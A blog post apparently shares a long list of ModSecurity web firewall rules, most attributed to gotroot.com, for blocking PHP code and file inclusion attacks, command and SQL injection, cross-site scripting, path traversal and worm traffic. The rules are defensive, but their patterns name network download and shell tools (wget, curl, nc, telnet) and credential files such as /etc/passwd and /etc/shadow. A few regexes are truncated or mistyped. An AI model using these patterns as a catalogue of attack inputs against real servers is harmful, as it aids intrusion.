FreeBSD India

There are many articles on how to setup modsecurity in google, so i’m not including it here, but from my experience, many admins have problem with adding rules for modsecurity. After lot of research in google, and my own research, i’ve made the list of some modseucrity rules, some of them are as under, sorry if i forgot to include credit for any site, these rules really help, though they might cause problem with some site/scripts, but most of them just works fine:

#really broad furl_fopen attack sig
#tune this for your system
#MTS
SecFilterSelective REQUEST_URI “!(/tiki-objectpermissions|aardvarkts/install/index|/gallery/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)” “chain,id:300018,rev:1,severity:2,msg:’Generic PHP code injection protection’”
SecFilterSelective REQUEST_URI “\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)”

#Genenric PHP body attack
SecFilterSelective THE_REQUEST “(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)” chain
SecFilterSelective POST_PAYLOAD “^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])”

#Generic PHP remote file injection
SecFilterSelective REQUEST_URI “!((galler(y|i)/do_command))” chain
SecFilterSelective REQUEST_URI “\.php\?.*=(http|http|ftp)\:/.*(cmd|command)=”

#remote file inclusion generic attack signature
SecFilterSelective REQUEST_URI “\.php\?.*=(http|https|ftp)\:/.*\?&cmd=”

#PHP remote path attach generic signature
SecFilterSelective REQUEST_URI “\.ph(p(3|4)?).*path=(http|https|ftp)\:/”
SecFilterSelective REQUEST_URI “\.php.*path=(http|https|ftp)\:/”

#PHP Injection Attack generic signature
SecFilterSelective REQUEST_URI “\.php” chain
SecFilter “(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))”

#PHP Injection Attack generic signature
SecFilterSelective REQUEST_URI “\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|cat|include_location|gorumDir|root|page|site|topside|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))”

#Generic PHP remote file inclusion attack signature
SecFilterSelective REQUEST_URI “\.php\?” chain
SecFilter “(http|https|ftp)\:/” chain
SecFilter “(cmd|command)=(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])”

#Generic PHP remote file inclusion attack signature
SecFilterSelective REQUEST_URI “\.php\?” chain
SecFilter “(http|https|ftp)\:/” chain
SecFilter “(cmd|command)=.*(cd|\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])”

#PHP defenses
SecFilterSelective ARG_PHPSESSID “!^[0-9a-z]*$”

#PHP defenses
SecFilterSelective ARGS_NAMES “^(globals($|\[)|php:/)”

#PHP defenses
SecFilterSelective COOKIE_PHPSESSID “!^[0-9a-z]*$”

#generic sig for more bad PHP functions
SecFilterSelective THE_REQUEST “chr\(([0-9]{1,3})\)”
SecFilterSelective ARGS_NAMES “^php:/”

SecFilterSelective THE_REQUEST “cd \.\.”
SecFilterSelective THE_REQUEST “/\.(history|bash_history) HTTP\/(0\.9|1\.0|1\.1)$”

#generic block for fwrite fopen uploads
SecFilterSelective THE_REQUEST “fwrite” chain
SecFilterSelective THE_REQUEST “fopen”

# WEB-MISC Tomcat view source attempt
SecFilterSelective THE_REQUEST “\x252ejsp”

# TIKIWIKI
SecFilterSelective REQUEST_URI “/tiki-map.phtml\?mapfile=\.\./\.\./”

#SMTP redirects
SecFilterSelective THE_REQUEST ^(http|https)\:/.+:25

#These are VERY experiemental, please report false positives/negatives, etc.
#very experimental generic remote download sig
#foo IP or FQDN, or foo http/https/ftp://whatever
SecFilterSelective THE_REQUEST “(perl|t?ftp|links|elinks|lynx|ncftp|(s|r)(cp|sh)|wget|lwp-(download|request|mirror|rget)|curl|cvs|svn).*\x20((http|https|ftp)\:/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|0-9]\.[a-zA-Z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)”

#Command inline detection
SecFilterSelective THE_REQUEST “( |\;|/|\’|,|\&|\=|\.)((s|r)(sh|cp)) *(.*\@.*|(http|https|ftp)\:/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[A-Za-z|0-9]\.[a-zA-Z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)”

#very experimental connect command sig
SecFilterSelective THE_REQUEST “( |\;|/|\’|,|\&|\=|\.)(perl|nc|telnet|(rs)sh|rexec) .*([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[A-Za-z|0-9]\.[a-zA-Z]{2,4}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)”

# Web-attacks chdir
SecFilterSelective REQUEST_URI “&(cmd|command)=chdir\x20″

#Don’t accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
SecFilterSelective HTTP_Transfer-Encoding “chunked” “id:300003,rev:1,severity:2,msg:’Chunked Transfer Encoding denied’”

#Code injection via content length
SecFilterSelective HTTP_Content-Length “\;(system|passthru|exec)\(” “id:330003,rev:1,severity:2,msg:’Code Injection in Content-Length header’”

#broad cross site scripting rule
#False alarms are a problem with this, use with caution
#SecFilterSelective THE_REQUEST “<(.|\n)+>”

#generic recursion signatures
SecFilterSelective REQUEST_URI “!(alt_mod_frameset\.php)” “chain,id:300004,rev:1,severity:2,msg:’Generic Path Recursion denied’”
SecFilterSelective THE_REQUEST “\.\./\.\./”
#generic path recurision sig

#generic recursion signatures
SecFilterSelective THE_REQUEST “\.\|\./\.\|\./\.\|” “id:300005,rev:1,severity:2,msg:’Generic Path Recursion denied’”

#generic bogus path sigs
SecFilterSelective THE_REQUEST “\.\.\./” “id:300006,rev:1,severity:2,msg:’Bogus Path denied’”
SecFilterSelective POST_PAYLOAD “[[:space:]]+\.\.\.+\;” “id:300007,rev:1,severity:2,msg:’Bogus Path denied’”

#Generic PHP exploit signatures
SecFilterSelective THE_REQUEST “(chr|fwrite|fopen|system|e?chr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;” “id:330001,rev:1,severity:2,msg:’Generic PHP exploit pattern denied’”

#Generic PHP exploit signatures
SecFilterSelective POST_PAYLOAD|REQUEST_URI “<\?php (chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;” “id:330002,rev:1,severity:2,msg:’Generic PHP exploit pattern denied’”

#slightly tighter rules with narrower focus
SecFilterSelective REQUEST_URI|POST_PAYLOAD “(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;” “id:300008,rev:1,severity:2,msg:’Generic PHP exploit pattern denied’”

#generic XSS PHP attack types
SecFilterSelective REQUEST_URI “\.php\?” “chain,id:300010,rev:1,severity:2,msg:’Generic PHP XSS exploit pattern denied’”
SecFilter “(javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body.\innerHTML=window\.opener\.document\.body\.innerHTML\.replace)|onmouseover=\’javascript)”

#Prevent SQL injection in cookies
SecFilterSelective COOKIE_VALUES “((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\’.*\’.*,[0-9].*INTO.*FROM)” “id:300011,rev:1,severity:2,msg:’Generic SQL injection in cookie’”

#Prevent command injection through cookies
SecFilterSelective COOKIE_VALUES “\; cmd=”

#Prevent SQL injection in UA
SecFilterSelective HTTP_USER_AGENT “((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\’.*\’.*,[0-9].*INTO.*FROM)” “id:300012,rev:1,severity:2,msg:’Generic SQL injection in User Agent header’”

# Generic filter to prevent SQL injection attacks
# Understand that all SQL filters are very limited and are very difficult
# to prevent false postives and negatives.
# Pplease report false positives/negatives to mike@gotroot.com
SecFilterSelective REQUEST_URI “!((/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/horde3?/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(Downloads|Submit_News)|/admin\.php\?module=NS\-AddStory\&op=|/index\.php\?name=PNphpBB2&file=posting&mode=reply.*|/phpMyAdmin/|/PNphpBB2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/_mmServerScripts/|/node/[0-9]+/edit|/_vti_bin/.*\.exe/)” “chain,id:300013,rev:1,severity:2,msg:’Generic SQL injection protection’”
SecFilter “((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\’.*\’.*,[0-9].*INTO.*FROM)”
#Generic SQL sigs
SecFilterSelective ARGS “(or.+1[[:space:]]*=[[:space:]]1|(or 1=1|’.+)–’)” “id:300014,rev:1,severity:2,msg:’Generic SQL injection protection’”

#Generic SQL sigs
SecFilterSelective ARGS “((alter|create|drop)[[:space:]]+(column|database|procedure|table)|delete[[:space:]]+from|update.+set.+=)” “id:300015,rev:1,severity:2,msg:’Generic SQL injection protection’”

#Generic SQL sigs
SecFilterSelective REQUEST_URI “!(/node/[0-9]+/edit|/forum/posting\.php|/admins/wnedit\.php|/alt_doc\.php\?returnUrl=.*edit|/admin/categories\.php\?cPath=.*|modules\.php\?name=Forums&file=posting&mode=.*)” “chain,id:300016,rev:1,severity:2,msg:’Generic SQL injection protection’”
SecFilterSelective ARGS “(insert[[:space:]]+into.+values|select.+from|bulk[[:space:]]+insert|union.+select)”

#Generic command line attack filter
SecFilterSelective REQUEST_URI “!(/Count\.cgi)” “chain,id:300017,rev:1,severity:2,msg:’Generic command line attack filter’”
SecFilterSelective THE_REQUEST “\|+.*[\x20].*[\x20].*\|”

#Generic PHP bad functions protection
#PHP copy() function: http://securitytracker.com/alerts/2006/Apr/1015882.html
SecFilterSelective ARGS_VALUES compress\.zlib:

#Generic XSS filter
#please report false positives
SecFilterSelective REQUEST_URI “!/mt\.cgi” chain
SecFilter “<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>”

#XSS in referrer and UA headers
SecFilterSelective HTTP_REFERER|HTTP_USER_AGENT “<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>”

#script, perl, etc. code in HTTP_Referer string
SecFilterSelective HTTP_Referer “\#\!.*/”

#generic command line attack
SecFilterSelective REQUEST_URI|ARGS “\|*id\;echo*\|”

#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST “\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?” chain
SecFilter “((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)”

#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST “\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)=”

#remote file inclusion generic attack signature
SecFilterSelective ARGS “\.(dat|gif|jpg|png|bmp|txt|vir|dot)” chain
SecFilter “\?\&(cmd|inc|name)=”

#remote file inclusion generic attack signature
SecFilterSelective ARGS “\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)=”

#Bogus file extensions generic signature
SecFilterSelective THE_REQUEST “[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt”

#generic attack sig
SecFilterSelective THE_REQUEST “cd\x20*\;(cd|\;|echo|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)”

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST “uname” chain
SecFilter “\x20-a”

#Enforce proper HTTP requests
SecFilterSelective SERVER_PROTOCOL “!^HTTP/(0\.9|1\.0|1\.1)$” “id:340000,rev:1,severity:1,msg:’Bad HTTP Protocol’”

# Don’t accept transfer encodings we know we don’t handle
# (and you don’t need it anyway)
SecFilterSelective HTTP_Transfer-Encoding “!^$” “id:340004,rev:1,severity:2,msg:’Dis-allowed Transfer Encoding’”

#HTTP response spilting generic sigs
SecFilter “Content-Length\:.*Content-Type\:.*Content-Type\:” “id:340005,rev:1,severity:2,msg:’HTTP response splitting’”

#HTTP response spilting generic sigs
SecFilter “Content-Length\:” “chain,id:340006,rev:1,severity:2,msg:’HTTP response splitting’”
SecFilter “Content-Type\:” chain
SecFilter “Content-Type\:”

#deny TRACE method
SecFilterSelective REQUEST_METHOD “TRACE” “id:340007,rev:1,severity:2,msg:’TRACE method denied’”

#XSS insertion into Content-Type
SecFilterSelective THE_REQUEST “Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)” “id:300002,rev:1,severity:2,msg:’XSS attack in Content-type header’”

#Generic argument protection rule against bad meta characters
#SecFilterSelective “ARGS” “!^[A-Za-z0-9.&/?@_%=:;, -]*$”

#generic php attack sigs
SecFilterSelective REQUEST_URI “(&(cmd|command)=(id|uname)\x20|cmd\?(cmd|command)=|(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)=|\.php\?&(cmd|command)=)”

# WEB-ATTACKS xterm command attempt
SecFilterSelective THE_REQUEST “/usr/X11R6/bin/xterm”

# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST “/etc/shadow”

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST “/bin/ps”

# WEB-ATTACKS /usr/bin/id command attempt
SecFilterSelective THE_REQUEST “/usr/bin/id” chain
SecFilter “\x20″

# WEB-ATTACKS echo command attempt
SecFilterSelective THE_REQUEST “/bin/echo” chain
SecFilter “\x20″

# WEB-ATTACKS kill command attempt
SecFilterSelective THE_REQUEST “/bin/kill” chain
SecFilter “\x20″

# WEB-ATTACKS chmod command attempt
SecFilterSelective THE_REQUEST “/bin/chmod” chain
SecFilter “\x20″

# WEB-ATTACKS chsh command attempt
SecFilterSelective THE_REQUEST “/usr/bin/chsh”

# WEB-ATTACKS gcc command attempt
SecFilterSelective THE_REQUEST “gcc” chain
SecFilter “x20-o”

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilterSelective THE_REQUEST “/usr/bin/cc” chain
SecFilter “\x20″

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilterSelective THE_REQUEST “/usr/bin/cpp” chain
SecFilter “\x20″

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilterSelective THE_REQUEST “/usr/bin/g\+\+” chain
SecFilter “\x20″

# WEB-ATTACKS g++ command attempt
SecFilterSelective THE_REQUEST “g\+\+\x20″ chain
SecFilter “\x20″

# WEB-ATTACKS bin/python access attempt
SecFilterSelective THE_REQUEST “bin/python” chain
SecFilter “\x20″

# WEB-ATTACKS python access attempt
#SecFilter “python\x20″

# WEB-ATTACKS bin/tclsh execution attempt
SecFilterSelective THE_REQUEST “bin/tclsh”

# WEB-ATTACKS tclsh execution attempt
SecFilterSelective THE_REQUEST “tclsh8\x20″

# WEB-ATTACKS bin/nasm command attempt
SecFilterSelective THE_REQUEST “bin/nasm”

# WEB-ATTACKS nasm command attempt
SecFilterSelective THE_REQUEST “nasm\x20″

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilterSelective THE_REQUEST “/usr/bin/perl”

# WEB-ATTACKS traceroute command attempt
SecFilterSelective THE_REQUEST “traceroute” chain
SecFilter “\x20([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)”

# WEB-ATTACKS ping command attempt
SecFilterSelective THE_REQUEST “/bin/ping” chain
SecFilter “\x20″

# WEB-ATTACKS X application to remote host attempt
SecFilterSelective THE_REQUEST “\x20-display\x20″

# WEB-ATTACKS mail command attempt
SecFilterSelective THE_REQUEST “/bin/mail” chain
SecFilter “\x20″

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST “/bin/ls” chain
SecFilter “\x20″

# WEB-ATTACKS /etc/inetd.conf access
SecFilterSelective THE_REQUEST “/etc/inetd\.conf”

# WEB-ATTACKS /etc/motd access
SecFilterSelective THE_REQUEST “/etc/motd”
# WEB-ATTACKS conf/httpd.conf attempt
SecFilterSelective THE_REQUEST “conf/httpd\.conf”

# WEB-MISC .htpasswd access
SecFilterSelective THE_REQUEST “\.htpasswd”

# WEB-MISC /etc/passwd access
SecFilterSelective REQUEST_URI “/etc/passwd”

# WEB-MISC nessus 1.X 404 probe
SecFilterSelective REQUEST_URI “/nessus_is_probing_you_”

# WEB-MISC nessus 2.x 404 probe
SecFilterSelective REQUEST_URI “/NessusTest”

# WEB-MISC ls%20-l
SecFilterSelective THE_REQUEST “ls” chain
SecFilter “\x20-l”

# WEB-MISC apache directory disclosure attempt
SecFilterSelective THE_REQUEST “////////”

#musicat empower attempt
SecFilterSelective REQUEST_URI “/empower\?DB=”

# WEB-MISC Apache Chunked-Encoding worm attempt
SecFilter “CCCCCCC\: AAAAAAAAAAAAAAAAAAA”

# WEB-MISC *%0a.pl access
SecFilterSelective REQUEST_URI “/*\x0a\.pl”

#PHPBB worm sigs
SecFilterSelective REQUEST_URI “!(tiki-searchindex\.php)” chain
SecFilterSelective ARG_highlight “(\x27|%27|\x2527|%2527)”

# WEB-FRONTPAGE …. request
SecFilterSelective THE_REQUEST “\.\.\.\./”

#experimental CSS rule
#SecFilterSelective REQUEST_URI “/(\x3C|<)(\x2F|\/)*[a-z0-9\%]+(\x3E|>)”

#Generic attack rules pcre format
#cross site scripting attempt IMG onerror or onload
SecFilterSelective THE_REQUEST “\

#cross site scripting attempt STYLE + JAVASCRIPT
SecFilterSelective THE_REQUEST “TYPE\s*=\s*[\’\”]application\/x-javascript”

#cross site scripting attempt STYLE + JSCRIPT
SecFilterSelective THE_REQUEST “TYPE\s*=\s*[\’\”]text\/jscript”

# cross site scripting attempt STYLE + VBSCRIPT
SecFilterSelective THE_REQUEST “TYPE\s*=\s*[\’\”]text\/vbscript”

#cross site scripting attempt STYLE + VBSCRIPT
SecFilterSelective THE_REQUEST “TYPE\s*=\s*[\’\”]application\/x-vbscript”

#cross site scripting attempt STYLE + ECMACRIPT
SecFilterSelective THE_REQUEST “TYPE\s*=\s*[\’\”]text\/ecmascript”

# cross site scripting attempt STYLE + EXPRESSION
SecFilterSelective THE_REQUEST “STYLE[\s]*=[\s]*[^>]expression[\s]*\(”

#cross site scripting attempt STYLE + EXPRESSION
SecFilterSelective THE_REQUEST “[\s]*expression[\s]*\([^}]}[\s]*<\/STYLE>”

# cross site scripting attempt using XML
SecFilterSelective THE_REQUEST “SCRIPT”

#cross site scripting attempt executing hidden Javascript
SecFilterSelective THE_REQUEST “eval[\s]*\([\s]*[^\.]\.innerHTML[\s]*\)”

#cross site scripting attempt executing hidden Javascript
SecFilterSelective THE_REQUEST “window\.execScript[\s]*\(”

#cross site scripting attempt to execute Javascript code
SecFilterSelective THE_REQUEST “/(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\’\”]*javascript[\:]”

#cross site scripting stealth attempt to execute Javascript code
#may false alarm for some language sets
SecFilterSelective REQUEST_URI “!(/index\.php\?module=Blocks&type=admin&func=update|/index\.php\?go=.*&edit=)” chain
SecFilter “(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\’\”]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]”

#cross site scripting HTML Image tag set to javascript attempt
SecFilterSelective THE_REQUEST “img xsrc=javascript”

#Apache /server-info accessible
SecFilterSelective REQUEST_URI “/server-info” chain
SecFilterSelective REMOTE_ADDR “!^127\.0\.0\.1$”

#Apache /server-status accessible
#Modified so apache-protect can run
SecFilterSelective REQUEST_URI “^/server-status/$” chain
SecFilterSelective REMOTE_ADDR “!^127\.0\.0\.1$”

#generic Common HTTP vulnerability
SecFilterSelective THE_REQUEST “/\?cwd=/”

#General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
SecFilterSelective THE_REQUEST “\.php\?” chain
SecFilter “\[url=(script|javascript|applet|about|chrome|activex)\:/.*\].*\[/url\]”

#Experimental XML-RPC generic attack sigs
SecFilter “\’\,\’\’\)\)\;”
SecFilter “\

\.*\’\)\;”#XML-RPC generic attack sigs
SecFilterSelective POST_PAYLOAD “^Content-Type\: application/xml” chain
SecFilter “(\<.*xml)” chain
SecFilter “(echo( |\(|\’).*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;” chain
SecFilter “methodCall\>”

#Specific XML-RPC attacks on xmlrpc.php
SecFilterSelective THE_REQUEST “(/xmlrpc|.*xmlrpc_services)\.php” chain
SecFilter “(\<.*xml)” chain
SecFilter “(echo( |\(|\’).*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;”

#Too generic, unless you know you won’t see this in any of the fields of an XMLRPC message on your system
#SecFilterSelective THE_REQUEST “/xmlrpc\.php” chain
#SecFilter “(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)”

#XML-RPC SQL injection generic signature
SecFilterSelective THE_REQUEST “(/xmlrpc|.*xmlrpc_services)\.php” chain
SecFilter “.*.*.*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>”

#generic remote file inclusion vulns
SecFilterSelective THE_REQUEST “/index\.php\?do=.*&page=(http|https|ftp)\:/”
SecFilterSelective THE_REQUEST “/index\.php\?kietu\[.*\]=(http|https|ftp)\:/”
SecFilterSelective THE_REQUEST “/index\.php\?libDir=http://xxxxxxxx”
SecFilterSelective THE_REQUEST “/init\.php\?HTTP_POST_VARS\[GALLERY_BASEDIR\]=(http|https|ftp)\:/”

#Virus HTTP Challenge/Reponse Auth
SecFilterSelective THE_REQUEST “^Authorization\: Negotiate” chain
SecFilter “YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFB”

#catch smuggling attacks
SecFilter “^(GET|POST).*Host:.*^(GET|POST)”

#Drupal remote command execution vulnerability exploit signature
#This is already covered in another generic signature, but just in case you leave it out, here it is
#again with a slightly tigher regexp
SecFilter “\<.*php .*\(.*\)\;system\(.*\).*php*\>”
#Slightly stronger version of the above
SecFilter “\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\).*php*\>”

#Generic PHP attack sig
SecFilterSelective THE_REQUEST “system\(getenv\(HTTP_PHP\)\)”

#Generic Nessus request filter
SecFilterSelective THE_REQUEST “NessusTest*\.html”

#Generic PHP payload command injection and upload vulnerabilities
SecFilterSelective POST_PAYLOAD “<\?php” chain
SecFilter “((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)” chain
SecFilter “\<\?php”

#Generic XML RPC attack sig
SecFilterSelective POST_PAYLOAD “\’(______BEGIN______|_____FIM_____)\’\;”

#HTTP header PHP code injection attacks
SecFilterSelective HTTP_CLIENT_IP|HTTP_USER_AGENT|HTTP_Referer “(<\?php|<[[:space:]]?\?[[:space:]]?php|<\? php)”
#wormsign
SecFilter “XXXXXXXXXXXXXXX\: \+\+\+\+\+\+\+\+\+\+\+\+\+”
SecFilterSelective THE_REQUEST “THMC\.\$dbhost\.THMC\.\$dbname\.THMC\.\$dbuser\.THMC\.\$dbpasswd\.THMC”

#phpbb wormsign
SecFilterSelective THE_REQUEST “echo _GHC/RST_”

#Generic PHP avatar upload exploits
SecFilterSelective REQUEST_URI “\.php” chain
SecFilterSelective POST_PAYLOAD “Content-Disposition\: form-data\; name=\”avatar\”\;” chain
SecFilter “\<\?php” chain
SecFilter “\?>”

#Fake image file shell attacvk
SecFilterSelective HTTP_Content-Type “image/.*”
SecFilterSelective POST_PAYLOAD “chr\(”

#bogus graphics file
SecFilterSelective HTTP_Content-Disposition “\.php” chain
SecFilterSelective HTTP_Content-Type “(image/gif|image/jpg|image/png|image/bmp)”

#wormsign
SecFilterSelective REQUEST_URI “Hacked.*by.*member.*of.*SCC”

#Special account protection
SecFilterSelective THE_REQUEST “/~(root|ftp|bin|nobody|named|guest|logs|sshd)(/\S*)? HTTP/(0\.9|1\.[01])$”
SecFilterSelective REQUEST_URI “/~(root|ftp|bin|nobody|named|guest|logs|sshd)/”

#Generic PHP fopen sig
SecFilterSelective THE_REQUEST “fp=fopen\(”

# above filters added by kapil from http://www.gotroot.com/downloads/ftp/mod_security/rules.conf

# WEB-ATTACKS passwd command attempt - added by kapil
SecFilterSelective THE_REQUEST “/etc/passwd”

# WEB-ATTACKS passwd command attempt - added by kapil
SecFilterSelective THE_REQUEST “passwd”

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST “wget”

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST “wget ”

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST “uname -a”

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST “\.htgroup”

# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST “\.htaccess”

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter “javascript\://”

# WEB-MISC cross site scripting \(img xsrc=javascript\) attempt
SecFilter “img xsrc=javascript”

# WEB-MISC cd..
SecFilterSelective THE_REQUEST “cd\.\.”

